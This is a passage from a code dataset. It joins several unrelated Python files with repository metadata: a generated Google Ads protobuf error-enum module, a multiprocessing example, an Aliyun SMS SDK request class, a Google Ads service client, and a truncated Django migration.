  serialized_pb=_b('\nBgoogle/ads/googleads_v4/proto/errors/extension_setting_error.proto\x12\x1egoogle.ads.googleads.v4.errors\x1a\x1cgoogle/api/annotations.proto\"\x98\x14\n\x19\x45xtensionSettingErrorEnum\"\xfa\x13\n\x15\x45xtensionSettingError\x12\x0f\n\x0bUNSPECIFIED\x10\x00\x12\x0b\n\x07UNKNOWN\x10\x01\x12\x17\n\x13\x45XTENSIONS_REQUIRED\x10\x02\x12%\n!FEED_TYPE_EXTENSION_TYPE_MISMATCH\x10\x03\x12\x15\n\x11INVALID_FEED_TYPE\x10\x04\x12\x34\n0INVALID_FEED_TYPE_FOR_CUSTOMER_EXTENSION_SETTING\x10\x05\x12%\n!CANNOT_CHANGE_FEED_ITEM_ON_CREATE\x10\x06\x12)\n%CANNOT_UPDATE_NEWLY_CREATED_EXTENSION\x10\x07\x12\x33\n/NO_EXISTING_AD_GROUP_EXTENSION_SETTING_FOR_TYPE\x10\x08\x12\x33\n/NO_EXISTING_CAMPAIGN_EXTENSION_SETTING_FOR_TYPE\x10\t\x12\x33\n/NO_EXISTING_CUSTOMER_EXTENSION_SETTING_FOR_TYPE\x10\n\x12-\n)AD_GROUP_EXTENSION_SETTING_ALREADY_EXISTS\x10\x0b\x12-\n)CAMPAIGN_EXTENSION_SETTING_ALREADY_EXISTS\x10\x0c\x12-\n)CUSTOMER_EXTENSION_SETTING_ALREADY_EXISTS\x10\r\x12\x35\n1AD_GROUP_FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE\x10\x0e\x12\x35\n1CAMPAIGN_FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE\x10\x0f\x12\x35\n1CUSTOMER_FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE\x10\x10\x12\x16\n\x12VALUE_OUT_OF_RANGE\x10\x11\x12$\n CANNOT_SET_FIELD_WITH_FINAL_URLS\x10\x12\x12\x16\n\x12\x46INAL_URLS_NOT_SET\x10\x13\x12\x18\n\x14INVALID_PHONE_NUMBER\x10\x14\x12*\n&PHONE_NUMBER_NOT_SUPPORTED_FOR_COUNTRY\x10\x15\x12-\n)CARRIER_SPECIFIC_SHORT_NUMBER_NOT_ALLOWED\x10\x16\x12#\n\x1fPREMIUM_RATE_NUMBER_NOT_ALLOWED\x10\x17\x12\x1a\n\x16\x44ISALLOWED_NUMBER_TYPE\x10\x18\x12(\n$INVALID_DOMESTIC_PHONE_NUMBER_FORMAT\x10\x19\x12#\n\x1fVANITY_PHONE_NUMBER_NOT_ALLOWED\x10\x1a\x12\x18\n\x14INVALID_COUNTRY_CODE\x10\x1b\x12#\n\x1fINVALID_CALL_CONVERSION_TYPE_ID\x10\x1c\x12-\n)CUSTOMER_NOT_WHITELISTED_FOR_CALLTRACKING\x10\x1d\x12*\n&CALLTRACKING_NOT_SUPPORTED_FOR_COUNTRY\x10\x1e\x12\x12\n\x0eINVALID_APP_ID\x10\x1f\x12&\n\"QUOTES_IN_REVIEW_EXTENSION_SNIPPET\x10 \x12\'\n#HYPHENS_IN_REVIEW_EXTENSION_SNIPPET\x10!\x12(\n$REVIEW_EXTENSION_SOURCE_NOT_ELIGIBLE\x10\"\x12(\n$SOURCE_NAME_IN_REVIEW_EXTENSION_TEXT\x10#\x12\x11\n\rMISSING_FIELD\x10$\x12\x1f\n\x1bINCONSISTENT_CURRENCY_CODES\x10%\x12*\n&PRICE_EXTENSION_HAS_DUPLICATED_HEADERS\x10&\x12\x34\n0PRICE_ITEM_HAS_DUPLICATED_HEADER_AND_DESCRIPTION\x10\'\x12%\n!PRICE_EXTENSION_HAS_TOO_FEW_ITEMS\x10(\x12&\n\"PRICE_EXTENSION_HAS_TOO_MANY_ITEMS\x10)\x12\x15\n\x11UNSUPPORTED_VALUE\x10*\x12\x1d\n\x19INVALID_DEVICE_PREFERENCE\x10+\x12\x18\n\x14INVALID_SCHEDULE_END\x10-\x12*\n&DATE_TIME_MUST_BE_IN_ACCOUNT_TIME_ZONE\x10/\x12%\n!OVERLAPPING_SCHEDULES_NOT_ALLOWED\x10\x30\x12 \n\x1cSCHEDULE_END_NOT_AFTER_START\x10\x31\x12\x1e\n\x1aTOO_MANY_SCHEDULES_PER_DAY\x10\x32\x12&\n\"DUPLICATE_EXTENSION_FEED_ITEM_EDIT\x10\x33\x12\x1b\n\x17INVALID_SNIPPETS_HEADER\x10\x34\x12<\n8PHONE_NUMBER_NOT_SUPPORTED_WITH_CALLTRACKING_FOR_COUNTRY\x10\x35\x12\x1f\n\x1b\x43\x41MPAIGN_TARGETING_MISMATCH\x10\x36\x12\"\n\x1e\x43\x41NNOT_OPERATE_ON_REMOVED_FEED\x10\x37\x12\x1b\n\x17\x45XTENSION_TYPE_REQUIRED\x10\x38\x12-\n)INCOMPATIBLE_UNDERLYING_MATCHING_FUNCTION\x10\x39\x12\x1d\n\x19START_DATE_AFTER_END_DATE\x10:\x12\x18\n\x14INVALID_PRICE_FORMAT\x10;\x12\x1a\n\x16PROMOTION_INVALID_TIME\x10<\x12<\n8PROMOTION_CANNOT_SET_PERCENT_DISCOUNT_AND_MONEY_DISCOUNT\x10=\x12>\n:PROMOTION_CANNOT_SET_PROMOTION_CODE_AND_ORDERS_OVER_AMOUNT\x10>\x12%\n!TOO_MANY_DECIMAL_PLACES_SPECIFIED\x10?\x12\x19\n\x15INVALID_LANGUAGE_CODE\x10@\x12\x18\n\x14UNSUPPORTED_LANGUAGE\x10\x41\x12\x30\n,CUSTOMER_CONSENT_FOR_CALL_RECORDING_REQUIRED\x10\x42\x12&\n\"EXTENSION_SETTING_UPDATE_IS_A_NOOP\x10\x43\x42\xf5\x01\n\"com.google.ads.googleads.v4.errorsB\x1a\x45xtensionSettingErrorProtoP\x01ZDgoogle.golang.org/genproto/googleapis/ads/googleads/v4/errors;errors\xa2\x02\x03GAA\xaa\x02\x1eGoogle.Ads.GoogleAds.V4.Errors\xca\x02\x1eGoogle\\Ads\\GoogleAds\\V4\\Errors\xea\x02\"Google::Ads::GoogleAds::V4::Errorsb\x06proto3')
,
dependencies=[google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_EXTENSIONSETTINGERRORENUM_EXTENSIONSETTINGERROR = _descriptor.EnumDescriptor(
name='ExtensionSettingError',
full_name='google.ads.googleads.v4.errors.ExtensionSettingErrorEnum.ExtensionSettingError',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='UNSPECIFIED', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNKNOWN', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EXTENSIONS_REQUIRED', index=2, number=2,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FEED_TYPE_EXTENSION_TYPE_MISMATCH', index=3, number=3,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_FEED_TYPE', index=4, number=4,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_FEED_TYPE_FOR_CUSTOMER_EXTENSION_SETTING', index=5, number=5,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CANNOT_CHANGE_FEED_ITEM_ON_CREATE', index=6, number=6,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CANNOT_UPDATE_NEWLY_CREATED_EXTENSION', index=7, number=7,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NO_EXISTING_AD_GROUP_EXTENSION_SETTING_FOR_TYPE', index=8, number=8,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NO_EXISTING_CAMPAIGN_EXTENSION_SETTING_FOR_TYPE', index=9, number=9,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='NO_EXISTING_CUSTOMER_EXTENSION_SETTING_FOR_TYPE', index=10, number=10,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AD_GROUP_EXTENSION_SETTING_ALREADY_EXISTS', index=11, number=11,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CAMPAIGN_EXTENSION_SETTING_ALREADY_EXISTS', index=12, number=12,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CUSTOMER_EXTENSION_SETTING_ALREADY_EXISTS', index=13, number=13,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='AD_GROUP_FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE', index=14, number=14,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CAMPAIGN_FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE', index=15, number=15,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CUSTOMER_FEED_ALREADY_EXISTS_FOR_PLACEHOLDER_TYPE', index=16, number=16,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VALUE_OUT_OF_RANGE', index=17, number=17,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CANNOT_SET_FIELD_WITH_FINAL_URLS', index=18, number=18,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='FINAL_URLS_NOT_SET', index=19, number=19,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_PHONE_NUMBER', index=20, number=20,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PHONE_NUMBER_NOT_SUPPORTED_FOR_COUNTRY', index=21, number=21,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CARRIER_SPECIFIC_SHORT_NUMBER_NOT_ALLOWED', index=22, number=22,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PREMIUM_RATE_NUMBER_NOT_ALLOWED', index=23, number=23,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DISALLOWED_NUMBER_TYPE', index=24, number=24,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_DOMESTIC_PHONE_NUMBER_FORMAT', index=25, number=25,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='VANITY_PHONE_NUMBER_NOT_ALLOWED', index=26, number=26,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_COUNTRY_CODE', index=27, number=27,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_CALL_CONVERSION_TYPE_ID', index=28, number=28,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CUSTOMER_NOT_WHITELISTED_FOR_CALLTRACKING', index=29, number=29,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CALLTRACKING_NOT_SUPPORTED_FOR_COUNTRY', index=30, number=30,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_APP_ID', index=31, number=31,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='QUOTES_IN_REVIEW_EXTENSION_SNIPPET', index=32, number=32,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='HYPHENS_IN_REVIEW_EXTENSION_SNIPPET', index=33, number=33,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='REVIEW_EXTENSION_SOURCE_NOT_ELIGIBLE', index=34, number=34,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SOURCE_NAME_IN_REVIEW_EXTENSION_TEXT', index=35, number=35,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='MISSING_FIELD', index=36, number=36,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INCONSISTENT_CURRENCY_CODES', index=37, number=37,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PRICE_EXTENSION_HAS_DUPLICATED_HEADERS', index=38, number=38,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PRICE_ITEM_HAS_DUPLICATED_HEADER_AND_DESCRIPTION', index=39, number=39,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PRICE_EXTENSION_HAS_TOO_FEW_ITEMS', index=40, number=40,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PRICE_EXTENSION_HAS_TOO_MANY_ITEMS', index=41, number=41,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNSUPPORTED_VALUE', index=42, number=42,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_DEVICE_PREFERENCE', index=43, number=43,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_SCHEDULE_END', index=44, number=45,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DATE_TIME_MUST_BE_IN_ACCOUNT_TIME_ZONE', index=45, number=47,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='OVERLAPPING_SCHEDULES_NOT_ALLOWED', index=46, number=48,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SCHEDULE_END_NOT_AFTER_START', index=47, number=49,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TOO_MANY_SCHEDULES_PER_DAY', index=48, number=50,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='DUPLICATE_EXTENSION_FEED_ITEM_EDIT', index=49, number=51,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_SNIPPETS_HEADER', index=50, number=52,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PHONE_NUMBER_NOT_SUPPORTED_WITH_CALLTRACKING_FOR_COUNTRY', index=51, number=53,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CAMPAIGN_TARGETING_MISMATCH', index=52, number=54,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CANNOT_OPERATE_ON_REMOVED_FEED', index=53, number=55,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EXTENSION_TYPE_REQUIRED', index=54, number=56,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INCOMPATIBLE_UNDERLYING_MATCHING_FUNCTION', index=55, number=57,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='START_DATE_AFTER_END_DATE', index=56, number=58,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_PRICE_FORMAT', index=57, number=59,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PROMOTION_INVALID_TIME', index=58, number=60,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PROMOTION_CANNOT_SET_PERCENT_DISCOUNT_AND_MONEY_DISCOUNT', index=59, number=61,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='PROMOTION_CANNOT_SET_PROMOTION_CODE_AND_ORDERS_OVER_AMOUNT', index=60, number=62,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='TOO_MANY_DECIMAL_PLACES_SPECIFIED', index=61, number=63,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INVALID_LANGUAGE_CODE', index=62, number=64,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='UNSUPPORTED_LANGUAGE', index=63, number=65,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='CUSTOMER_CONSENT_FOR_CALL_RECORDING_REQUIRED', index=64, number=66,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='EXTENSION_SETTING_UPDATE_IS_A_NOOP', index=65, number=67,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=163,
serialized_end=2717,
)
_sym_db.RegisterEnumDescriptor(_EXTENSIONSETTINGERRORENUM_EXTENSIONSETTINGERROR)
_EXTENSIONSETTINGERRORENUM = _descriptor.Descriptor(
name='ExtensionSettingErrorEnum',
full_name='google.ads.googleads.v4.errors.ExtensionSettingErrorEnum',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
],
extensions=[
],
nested_types=[],
enum_types=[
_EXTENSIONSETTINGERRORENUM_EXTENSIONSETTINGERROR,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=133,
serialized_end=2717,
)
_EXTENSIONSETTINGERRORENUM_EXTENSIONSETTINGERROR.containing_type = _EXTENSIONSETTINGERRORENUM
DESCRIPTOR.message_types_by_name['ExtensionSettingErrorEnum'] = _EXTENSIONSETTINGERRORENUM
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
ExtensionSettingErrorEnum = _reflection.GeneratedProtocolMessageType('ExtensionSettingErrorEnum', (_message.Message,), dict(
DESCRIPTOR = _EXTENSIONSETTINGERRORENUM,
__module__ = 'google.ads.googleads_v4.proto.errors.extension_setting_error_pb2'
,
__doc__ = """Container for enum describing validation errors of extension settings.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v4.errors.ExtensionSettingErrorEnum)
))
_sym_db.RegisterMessage(ExtensionSettingErrorEnum)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
]
| |
a6f5582fc0f55ce1b8816e501641d8eb3f2f9ea4 | 946c04aa741b557daf56eac46385a613ac5e0cf2 | /PP4E/System/Processes/multi1.py | 2a10bd15027c964d91e4c4a8242d98ae4a2739d0 | []
| no_license | Ozavr/lutz | 513ba0ca91d7188b2d28f649efe454603121106f | 0ee96b5859c81ab04e8d2a3523a17fff089f12f2 | refs/heads/master | 2021-01-02T23:18:16.680021 | 2018-09-04T22:27:35 | 2018-09-04T22:27:35 | 99,497,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,076 | py | """
Basics of the multiprocessing package: the Process class behaves much like
threading.Thread, but runs a function in a separate process rather than in a
thread; locks can be used for synchronization, e.g. to serialize printed
output; starts a new interpreter process on Windows and forks a child
process on Unix.
"""
import os
from multiprocessing import Process, Lock
def whoami(label, lock):
msg = '%s: name:%s, pid:%s'
with lock:
        print(msg % (label, __name__, os.getpid()))  # getpid: the 'pid' label refers to this process's own pid
if __name__ == '__main__':
lock = Lock()
whoami('function call', lock)
p = Process(target=whoami, args=('spawned child', lock))
p.start()
    p.join()
for i in range(5):
Process(target=whoami, args=(('run process %s' % i), lock)).start()
with lock:
print('Main process exit.') | [
"[email protected]"
]
| |
f90a330761a43f328e206363dca801aabefd20f4 | 83de24182a7af33c43ee340b57755e73275149ae | /aliyun-python-sdk-dysmsapi/aliyunsdkdysmsapi/request/v20170525/AddSmsSignRequest.py | c3e037abfab8fb2d6f9075b66dd5a949c573ec10 | [
"Apache-2.0"
]
| permissive | aliyun/aliyun-openapi-python-sdk | 4436ca6c57190ceadbc80f0b1c35b1ab13c00c7f | 83fd547946fd6772cf26f338d9653f4316c81d3c | refs/heads/master | 2023-08-04T12:32:57.028821 | 2023-08-04T06:00:29 | 2023-08-04T06:00:29 | 39,558,861 | 1,080 | 721 | NOASSERTION | 2023-09-14T08:51:06 | 2015-07-23T09:39:45 | Python | UTF-8 | Python | false | false | 2,870 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkdysmsapi.endpoint import endpoint_data
class AddSmsSignRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Dysmsapi', '2017-05-25', 'AddSmsSign')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerId(self):
return self.get_query_params().get('ResourceOwnerId')
def set_ResourceOwnerId(self,ResourceOwnerId):
self.add_query_param('ResourceOwnerId',ResourceOwnerId)
def get_Remark(self):
return self.get_query_params().get('Remark')
def set_Remark(self,Remark):
self.add_query_param('Remark',Remark)
def get_SignName(self):
return self.get_query_params().get('SignName')
def set_SignName(self,SignName):
self.add_query_param('SignName',SignName)
def get_SignFileLists(self):
return self.get_body_params().get('SignFileList')
def set_SignFileLists(self, SignFileLists):
for depth1 in range(len(SignFileLists)):
if SignFileLists[depth1].get('FileContents') is not None:
self.add_body_params('SignFileList.' + str(depth1 + 1) + '.FileContents', SignFileLists[depth1].get('FileContents'))
if SignFileLists[depth1].get('FileSuffix') is not None:
self.add_body_params('SignFileList.' + str(depth1 + 1) + '.FileSuffix', SignFileLists[depth1].get('FileSuffix'))
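	# Illustrative usage only (field semantics inferred from the parameter
	# names, not verified against Aliyun docs): SignFileLists is a list of
	# dicts keyed by 'FileContents' and 'FileSuffix', e.g.
	#   request.set_SignFileLists([{'FileContents': '<base64 data>', 'FileSuffix': 'jpg'}])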
def get_ResourceOwnerAccount(self):
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self,ResourceOwnerAccount):
self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId)
def get_SignSource(self):
return self.get_query_params().get('SignSource')
def set_SignSource(self,SignSource):
self.add_query_param('SignSource',SignSource) | [
"[email protected]"
]
| |
ad8838d4134389b893ad78037c7bacb4573923a7 | 450c45e780332f56ea339a83891f0c12d6120794 | /google/ads/google_ads/v2/services/age_range_view_service_client.py | e1aee0f95f28e5e679c2b9a8b0e6278f3c17cfec | [
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
]
| permissive | akaashhazarika/google-ads-python | 7766370cc526190c962dc9ff806520d459b05c25 | 25b43aa616020ad7dfa55b90fa236a29cf97d45a | refs/heads/master | 2020-06-07T08:56:21.533323 | 2019-06-27T15:26:49 | 2019-06-27T15:26:49 | 191,448,135 | 0 | 0 | Apache-2.0 | 2019-06-11T20:57:04 | 2019-06-11T20:57:04 | null | UTF-8 | Python | false | false | 9,812 | py | # -*- coding: utf-8 -*-
#
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Accesses the google.ads.googleads.v2.services AgeRangeViewService API."""
import pkg_resources
import warnings
from google.oauth2 import service_account
import google.api_core.gapic_v1.client_info
import google.api_core.gapic_v1.config
import google.api_core.gapic_v1.method
import google.api_core.gapic_v1.routing_header
import google.api_core.grpc_helpers
import google.api_core.path_template
from google.ads.google_ads.v2.services import age_range_view_service_client_config
from google.ads.google_ads.v2.services.transports import age_range_view_service_grpc_transport
from google.ads.google_ads.v2.proto.services import age_range_view_service_pb2
_GAPIC_LIBRARY_VERSION = pkg_resources.get_distribution(
'google-ads',
).version
class AgeRangeViewServiceClient(object):
"""Service to manage age range views."""
SERVICE_ADDRESS = 'googleads.googleapis.com:443'
"""The default address of the service."""
# The name of the interface for this client. This is the key used to
# find the method configuration in the client_config dictionary.
_INTERFACE_NAME = 'google.ads.googleads.v2.services.AgeRangeViewService'
@classmethod
def from_service_account_file(cls, filename, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
AgeRangeViewServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(
filename)
kwargs['credentials'] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@classmethod
def age_range_view_path(cls, customer, age_range_view):
"""Return a fully-qualified age_range_view string."""
return google.api_core.path_template.expand(
'customers/{customer}/ageRangeViews/{age_range_view}',
customer=customer,
age_range_view=age_range_view,
)
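    # Example (ids are illustrative):
    #   AgeRangeViewServiceClient.age_range_view_path('1234567890', '503001')
    #   -> 'customers/1234567890/ageRangeViews/503001'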
def __init__(self, transport=None, channel=None, credentials=None,
client_config=None, client_info=None):
"""Constructor.
Args:
transport (Union[~.AgeRangeViewServiceGrpcTransport,
Callable[[~.Credentials, type], ~.AgeRangeViewServiceGrpcTransport]): A transport
instance, responsible for actually making the API calls.
The default transport uses the gRPC protocol.
This argument may also be a callable which returns a
transport instance. Callables will be sent the credentials
as the first argument and the default transport class as
the second argument.
channel (grpc.Channel): DEPRECATED. A ``Channel`` instance
through which to make calls. This argument is mutually exclusive
with ``credentials``; providing both will raise an exception.
credentials (google.auth.credentials.Credentials): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is mutually exclusive with providing a
transport instance to ``transport``; doing so will raise
an exception.
client_config (dict): DEPRECATED. A dictionary of call options for
each method. If not specified, the default configuration is used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Raise deprecation warnings for things we want to go away.
if client_config is not None:
warnings.warn('The `client_config` argument is deprecated.',
PendingDeprecationWarning, stacklevel=2)
else:
client_config = age_range_view_service_client_config.config
if channel:
warnings.warn('The `channel` argument is deprecated; use '
'`transport` instead.',
PendingDeprecationWarning, stacklevel=2)
# Instantiate the transport.
# The transport is responsible for handling serialization and
# deserialization and actually sending data to the service.
if transport:
if callable(transport):
self.transport = transport(
credentials=credentials,
default_class=age_range_view_service_grpc_transport.AgeRangeViewServiceGrpcTransport,
)
else:
if credentials:
raise ValueError(
'Received both a transport instance and '
'credentials; these are mutually exclusive.'
)
self.transport = transport
else:
self.transport = age_range_view_service_grpc_transport.AgeRangeViewServiceGrpcTransport(
address=self.SERVICE_ADDRESS,
channel=channel,
credentials=credentials,
)
if client_info is None:
client_info = google.api_core.gapic_v1.client_info.ClientInfo(
gapic_version=_GAPIC_LIBRARY_VERSION,
)
else:
client_info.gapic_version = _GAPIC_LIBRARY_VERSION
self._client_info = client_info
# Parse out the default settings for retry and timeout for each RPC
# from the client configuration.
# (Ordinarily, these are the defaults specified in the `*_config.py`
# file next to this one.)
self._method_configs = google.api_core.gapic_v1.config.parse_method_configs(
client_config['interfaces'][self._INTERFACE_NAME],
)
# Save a dictionary of cached API call functions.
# These are the actual callables which invoke the proper
# transport methods, wrapped with `wrap_method` to add retry,
# timeout, and the like.
self._inner_api_calls = {}
# Service calls
def get_age_range_view(
self,
resource_name,
retry=google.api_core.gapic_v1.method.DEFAULT,
timeout=google.api_core.gapic_v1.method.DEFAULT,
metadata=None):
"""
Returns the requested age range view in full detail.
Args:
resource_name (str): The resource name of the age range view to fetch.
retry (Optional[google.api_core.retry.Retry]): A retry object used
to retry requests. If ``None`` is specified, requests will not
be retried.
timeout (Optional[float]): The amount of time, in seconds, to wait
for the request to complete. Note that if ``retry`` is
specified, the timeout applies to each individual attempt.
metadata (Optional[Sequence[Tuple[str, str]]]): Additional metadata
that is provided to the method.
Returns:
A :class:`~google.ads.googleads_v2.types.AgeRangeView` instance.
Raises:
google.api_core.exceptions.GoogleAPICallError: If the request
failed for any reason.
google.api_core.exceptions.RetryError: If the request failed due
to a retryable error and retry attempts failed.
ValueError: If the parameters are invalid.
"""
# Wrap the transport method to add retry and timeout logic.
if 'get_age_range_view' not in self._inner_api_calls:
self._inner_api_calls['get_age_range_view'] = google.api_core.gapic_v1.method.wrap_method(
self.transport.get_age_range_view,
default_retry=self._method_configs['GetAgeRangeView'].retry,
default_timeout=self._method_configs['GetAgeRangeView'].timeout,
client_info=self._client_info,
)
request = age_range_view_service_pb2.GetAgeRangeViewRequest(
resource_name=resource_name,
)
if metadata is None:
metadata = []
metadata = list(metadata)
try:
routing_header = [('resource_name', resource_name)]
except AttributeError:
pass
else:
routing_metadata = google.api_core.gapic_v1.routing_header.to_grpc_metadata(routing_header)
metadata.append(routing_metadata)
return self._inner_api_calls['get_age_range_view'](request, retry=retry, timeout=timeout, metadata=metadata)
| [
"[email protected]"
]
| |
eaa3af01316e70493317fc5e190e308304501276 | 5949db57f8de8278359f45fe64395f44017671bc | /blog/migrations/0002_auto_20180122_0552.py | fdc4f73978db4766bafa256495e6be4132467df4 | []
| no_license | andrewidya/personal_blog | 71ed6b83ac3c594fa40b9fb40145af3e37dd3079 | c64df84f65dafd03ac05cf222fc113416e6926d5 | refs/heads/master | 2020-04-08T16:39:30.559072 | 2018-11-28T16:20:48 | 2018-11-28T16:20:48 | 159,528,638 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,244 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-01-22 05:52
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='RelatedPage',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.RemoveField(
model_name='blogpage',
name='related_pages',
),
migrations.AddField(
model_name='relatedpage',
name='page_from',
field=modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='related_page_from', to='blog.BlogPage', verbose_name='Page From'),
),
migrations.AddField(
